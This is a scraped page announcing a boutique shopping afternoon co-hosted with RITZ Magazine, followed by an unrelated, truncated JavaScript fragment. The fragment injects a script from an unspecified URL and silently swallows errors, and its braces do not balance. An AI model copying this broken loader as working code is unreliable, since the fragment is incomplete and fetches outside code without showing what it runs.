Urban Diaries

Springing Into Summer

Springing Into Summer

An afternoon of retail therapy at Jyoti Sachdev Iyer’s boutique, co-hosted by Anjum Azeez and RITZ Magazine.

#RitzMagazine #InTheNews #MediaCoverage

 

Tanya Fontes with Designer Raj Shroff

 

Access the full coverage here: http://www.ritzmagazine.in/springing-into-summer/

const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;

script.onload = () => { clearTimeout(timer); resolve(); };

script.onerror = () => { clearTimeout(timer); reject(); };

const timer = setTimeout(() => { script.remove(); reject(); }, timeout);

document.body.appendChild(script); }); };

await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();